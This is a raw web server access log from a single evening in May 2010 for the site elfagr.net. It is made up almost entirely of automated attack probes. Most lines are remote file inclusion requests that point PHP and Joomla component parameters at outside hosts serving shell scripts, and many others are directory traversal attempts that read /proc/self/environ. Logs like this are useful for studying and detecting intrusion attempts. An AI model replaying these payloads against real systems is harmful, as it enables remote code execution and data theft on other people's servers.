81.208.34.38 - - [05/May/2010:17:11:16 -0700] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://nbashop.ru//imgs/nbashop/photos/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
81.208.34.38 - - [05/May/2010:17:11:16 -0700] "GET /logs/access.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://nbashop.ru//imgs/nbashop/photos/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
81.208.34.38 - - [05/May/2010:17:11:27 -0700] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://nbashop.ru//imgs/nbashop/photos/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
81.208.34.38 - - [05/May/2010:17:11:25 -0700] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://nbashop.ru//imgs/nbashop/photos/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
81.208.34.38 - - [05/May/2010:17:11:25 -0700] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://nbashop.ru//imgs/nbashop/photos/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
81.208.34.38 - - [05/May/2010:17:11:34 -0700] "GET /logs/access.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://nbashop.ru//imgs/nbashop/photos/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
81.208.34.38 - - [05/May/2010:17:22:32 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
81.208.34.38 - - [05/May/2010:17:22:24 -0700] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
81.208.34.38 - - [05/May/2010:17:22:32 -0700] "GET /logs/access.log%20%20//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
142.46.205.139 - - [05/May/2010:17:23:35 -0700] "GET /logs/access_091203.log//index.php?option=com_restaurante&task=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt?????%0D? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
142.46.205.139 - - [05/May/2010:17:23:35 -0700] "GET /index.php?option=com_restaurante&task=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt?????%0D? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
142.46.205.139 - - [05/May/2010:17:23:44 -0700] "GET /logs/access_091203.log//index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
142.46.205.139 - - [05/May/2010:17:23:44 -0700] "GET /logs//index.php?option=com_restaurante&task=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt?????%0D? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
142.46.205.139 - - [05/May/2010:17:23:35 -0700] "GET /logs/access_091203.log//index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
142.46.205.139 - - [05/May/2010:17:23:35 -0700] "GET /logs/access_091203.log/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt?????%0D? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
142.46.205.139 - - [05/May/2010:17:23:35 -0700] "GET /index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
142.46.205.139 - - [05/May/2010:17:23:44 -0700] "GET /logs//index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
142.46.205.139 - - [05/May/2010:17:23:36 -0700] "GET /index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
142.46.205.139 - - [05/May/2010:17:23:36 -0700] "GET /logs//index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
142.46.205.139 - - [05/May/2010:17:23:36 -0700] "GET /logs/access_091029.log//index.php?option=com_restaurante&task=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt?????%0D? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
142.46.205.139 - - [05/May/2010:17:23:45 -0700] "GET /logs/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt?????%0D? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
142.46.205.139 - - [05/May/2010:17:23:36 -0700] "GET /errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt?????%0D? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
142.46.205.139 - - [05/May/2010:17:23:36 -0700] "GET /logs/access_091029.log//index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
142.46.205.139 - - [05/May/2010:17:23:37 -0700] "GET /logs/access_091029.log//index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
142.46.205.139 - - [05/May/2010:17:23:45 -0700] "GET /logs/access_091029.log/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt?????%0D? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
78.110.50.139 - - [05/May/2010:17:35:35 -0700] "GET /index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
78.110.50.139 - - [05/May/2010:17:36:23 -0700] "GET /logs/access.log//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
78.110.50.139 - - [05/May/2010:17:36:24 -0700] "GET /index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
78.110.50.139 - - [05/May/2010:17:36:15 -0700] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
78.110.50.139 - - [05/May/2010:17:37:16 -0700] "GET /index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
78.110.50.139 - - [05/May/2010:17:38:31 -0700] "GET /logs/access_100114.log//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
78.110.50.139 - - [05/May/2010:17:38:31 -0700] "GET /index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
78.110.50.139 - - [05/May/2010:17:38:40 -0700] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
77.222.56.62 - - [05/May/2010:17:40:57 -0700] "GET /home.php?pagina=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
80.71.1.68 - - [05/May/2010:17:41:59 -0700] "GET /main.php?x=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
205.234.252.102 - - [05/May/2010:17:55:17 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
77.222.56.62 - - [05/May/2010:17:58:17 -0700] "GET /logs/access_091210.log//home.php?pagina=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
77.222.56.62 - - [05/May/2010:17:58:17 -0700] "GET /home.php?pagina=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
77.222.56.62 - - [05/May/2010:17:58:17 -0700] "GET /logs//home.php?pagina=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
121.190.102.21 - - [05/May/2010:18:13:14 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
121.190.102.21 - - [05/May/2010:18:13:23 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
121.190.102.21 - - [05/May/2010:18:13:14 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
121.190.102.21 - - [05/May/2010:18:15:11 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
121.190.102.21 - - [05/May/2010:18:15:11 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
121.190.102.21 - - [05/May/2010:18:15:20 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.236.47.182 - - [05/May/2010:18:24:13 -0700] "GET /basebuilder/src/main.inc.php?mj_config[src_path]=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.236.47.182 - - [05/May/2010:18:24:13 -0700] "GET /logs/access_090910.log//basebuilder/src/main.inc.php?mj_config[src_path]=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.236.47.182 - - [05/May/2010:18:24:13 -0700] "GET /logs/access_090917.log//basebuilder/src/main.inc.php?mj_config[src_path]=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.236.47.182 - - [05/May/2010:18:24:13 -0700] "GET /logs//basebuilder/src/main.inc.php?mj_config[src_path]=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
80.71.1.68 - - [05/May/2010:18:25:18 -0700] "GET /skin/zero_vote/error.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
188.72.241.37 - - [05/May/2010:18:27:33 -0700] "GET /skin/zero_vote/error.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
188.72.241.37 - - [05/May/2010:18:27:33 -0700] "GET /skin/zero_vote/error.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
222.122.52.80 - - [05/May/2010:18:37:36 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [05/May/2010:18:37:36 -0700] "GET /logs/access_090924.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [05/May/2010:18:37:36 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [05/May/2010:18:37:43 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.122.52.80 - - [05/May/2010:18:37:43 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.122.52.80 - - [05/May/2010:18:37:43 -0700] "GET /logs/access_091029.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.122.52.80 - - [05/May/2010:18:38:21 -0700] "GET /logs/access.log//include/bbs.lib.inc.php/bbs//include/bbs.lib.inc.php?deks=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [05/May/2010:18:38:21 -0700] "GET /include/bbs.lib.inc.php/bbs//include/bbs.lib.inc.php?deks=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [05/May/2010:18:38:21 -0700] "GET /logs//include/bbs.lib.inc.php/bbs//include/bbs.lib.inc.php?deks=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
188.72.241.37 - - [05/May/2010:18:38:35 -0700] "GET /logs/access.log/skin/zero_vote/error.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
188.72.241.37 - - [05/May/2010:18:38:35 -0700] "GET /skin/zero_vote/error.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
188.72.241.37 - - [05/May/2010:18:38:36 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
78.110.50.139 - - [05/May/2010:18:39:01 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
222.122.52.80 - - [05/May/2010:18:39:08 -0700] "GET /logs/access_090924.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [05/May/2010:18:39:17 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [05/May/2010:18:39:08 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
78.110.50.139 - - [05/May/2010:18:39:54 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
222.122.52.80 - - [05/May/2010:18:39:57 -0700] "GET /logs/access_091029.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.122.52.80 - - [05/May/2010:18:39:48 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.122.52.80 - - [05/May/2010:18:39:48 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
78.110.50.139 - - [05/May/2010:18:39:58 -0700] "GET /logs/access.log//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
78.110.50.139 - - [05/May/2010:18:39:59 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
78.110.50.139 - - [05/May/2010:18:39:59 -0700] "GET /logs//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
222.122.52.80 - - [05/May/2010:18:40:39 -0700] "GET /logs/access.log//include/bbs.lib.inc.php/bbs//include/bbs.lib.inc.php?deks=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [05/May/2010:18:40:30 -0700] "GET /logs//include/bbs.lib.inc.php/bbs//include/bbs.lib.inc.php?deks=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [05/May/2010:18:40:30 -0700] "GET /include/bbs.lib.inc.php/bbs//include/bbs.lib.inc.php?deks=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
80.71.1.68 - - [05/May/2010:18:42:44 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
80.71.1.68 - - [05/May/2010:18:42:44 -0700] "GET /skin/zero_vote/error.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
80.71.1.68 - - [05/May/2010:18:42:53 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
93.158.149.32 - - [05/May/2010:18:43:30 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
78.110.50.139 - - [05/May/2010:18:44:42 -0700] "GET /components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
222.236.47.182 - - [05/May/2010:18:51:17 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.236.47.182 - - [05/May/2010:18:51:17 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.236.47.182 - - [05/May/2010:18:51:26 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.236.47.182 - - [05/May/2010:18:52:43 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.236.47.182 - - [05/May/2010:18:52:51 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.236.47.182 - - [05/May/2010:18:52:43 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
78.110.50.139 - - [05/May/2010:18:55:27 -0700] "GET /logs/access.log//components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
78.110.50.139 - - [05/May/2010:18:55:18 -0700] "GET /components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
78.110.50.139 - - [05/May/2010:18:55:19 -0700] "GET /logs//components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
78.110.50.139 - - [05/May/2010:19:00:53 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
78.110.50.139 - - [05/May/2010:19:00:44 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
78.110.50.139 - - [05/May/2010:19:00:53 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
77.222.56.62 - - [05/May/2010:19:17:13 -0700] "GET /login.php?dir=http://urty.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
83.69.115.198 - - [05/May/2010:19:27:20 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.79" "elfagr.net"
193.47.80.49 - - [05/May/2010:19:33:34 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.elfagr.net"
193.47.80.49 - - [05/May/2010:19:33:34 -0700] "GET / HTTP/1.1" 200 1465 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.elfagr.net"
83.69.115.198 - - [05/May/2010:19:35:27 -0700] "GET /logs/access.log/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
83.69.115.198 - - [05/May/2010:19:35:36 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.79" "elfagr.net"
83.69.115.198 - - [05/May/2010:19:35:28 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "libwww-perl/5.79" "elfagr.net"
83.69.115.198 - - [05/May/2010:19:40:44 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.79" "elfagr.net"
217.149.62.1 - - [05/May/2010:19:40:55 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.149.62.1 - - [05/May/2010:19:40:47 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.149.62.1 - - [05/May/2010:19:40:56 -0700] "GET /logs/access_090924.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
91.121.181.34 - - [05/May/2010:19:42:54 -0700] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
217.149.62.1 - - [05/May/2010:19:42:54 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.149.62.1 - - [05/May/2010:19:43:03 -0700] "GET /logs/access_090924.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.149.62.1 - - [05/May/2010:19:42:54 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
81.93.240.89 - - [05/May/2010:19:43:10 -0700] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
83.69.115.198 - - [05/May/2010:19:50:30 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
83.69.115.198 - - [05/May/2010:19:50:30 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.79" "elfagr.net"
83.69.115.198 - - [05/May/2010:19:50:31 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "libwww-perl/5.79" "elfagr.net"
81.93.240.89 - - [05/May/2010:19:52:35 -0700] "GET /logs/access.log/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
